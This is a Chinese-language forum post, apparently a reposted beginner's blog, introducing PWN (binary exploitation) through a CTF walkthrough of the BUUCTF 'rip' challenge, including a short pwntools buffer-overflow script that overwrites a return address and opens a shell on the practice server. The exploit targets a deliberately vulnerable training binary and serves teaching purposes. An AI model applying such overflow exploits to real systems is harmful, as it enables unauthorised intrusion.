IT评测·应用市场-qidao123.com

标题: 菜鸟条记之PWN入门(1.0.0)前言 [打印本页]

作者: 盛世宏图    时间: 2024-9-17 21:47
标题: 菜鸟条记之PWN入门(1.0.0)前言
什么是 PWN?

PWN 是黑客术语中的俚语,是指攻破设备或者系统。它的发音类似于“砰”,固然也有师傅把它叫作“胖”。PWN 的目标是获取系统的控制权或执行未经授权的操作。
怎样入门 PWN

前置知识

工具和资源

PWN 大致内容

做PWN题的大致流程

这里使用buuctf中PWN板块的第二题rip为例子:BUUCTF在线评测 (buuoj.cn)
1. 下载和启动靶机

点开题目,里面会有一个可以下载的文件,以及启动靶机四个大字。如下图:

2. 将文件传入Linux假造机

打开Linux假造机,下载这个附件并将这个附件传入到Linux假造机中。此时我们可以看到这个附件叫pwn1
3. 检查二进制文件的安全性和架构

使用checksec工具(安装pwntools后就有了)去检察它的架构和位数以及保护开启的情况,这里因为是基础题所以什么保护都没有

4. 反编译和分析二进制文件

将文件拖动到IDA这类反编译工具中,对二进制文件进行反编译
下图中这个非常有魅力的女人头像的工具就是我们的IDA

刚刚我们通过checksec已经知道了pwn1他是64位的,那么就拖入64位的IDA中(实在如果你拖错了,IDA会提示你搞错了,所以checksec的主要功能是检察开启了什么保护)
拖入后会看到这个画面,直接OK就完事了

然后进入后,我们在左侧的Functions栏里面找到main函数并点击他

选中main函数后,按TAB键(一般在Q的左边)或者按F5键,此时就会显示伪C语言代码

5. 明白代码和找出漏洞

看懂代码(必要学习C语言),找出漏洞(必要学习相关的PWN知识),编写python脚本(必要学习python语言和使用pwntools等库)
pwntools的使用后续会进行介绍
  1. #PWN1 exp
  2. from pwn import *
  3. context.log_level = 'debug'
  4. #io = process('./pwn1') # 本地
  5. io = remote('node5.buuoj.cn',28735)
  6. payload = b"A"*15
  7. payload +=p64(0x401186)
  8. io.sendline(payload)
  9. io.interactive()
复制代码
这里我编写了python脚本,并将其定名为exp.py
6. 创建靶机并运行脚本实验攻击

点击启动靶机

会得到一串nc所在,这个可以在Linux中使用nc工具进行连接

这里我们使用python脚本去攻击它的时间,必要将其放入python脚本中
比如:io = remote('node5.buuoj.cn',28735)
我们实验运行这个脚本

然后输入指令cat flag就可以拿到我们想要的东西了,复制flag去平台提交即可

如果没有打通的话会输出提示
  • Got EOF while reading in interactive
    表示连接断开了,此时你输入cat flag是没有用的

    刷题平台推荐

    BUUCTF在线评测 (buuoj.cn)
    题库 | NSSCTF
    pwn.college
    ctf.show
    其中ctfshow大部分题目是收费的,但是里面的题目较为系统化,从简朴到困难,因此我个人比较推荐
    学习PWN黑白常漫长的过程,必要学习大量知识,以及进行大量的练习。很多难以明白的问题大概很长一段时间都无法得到办理,复杂的漏洞使用也常常想让人放弃。所以在文章的最后我想分享翁恺老师的一段话:“计算机里的所有东西都是人做出来的,别人能想的出来的,我也肯定能想的出来。在计算机里头没有任何黑魔法。所有的东西只是我现在还不知道而已,总有一天我会把所有细节所有内部的东西全都搞明白。”
    参考文献


    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




    欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/) Powered by Discuz! X3.4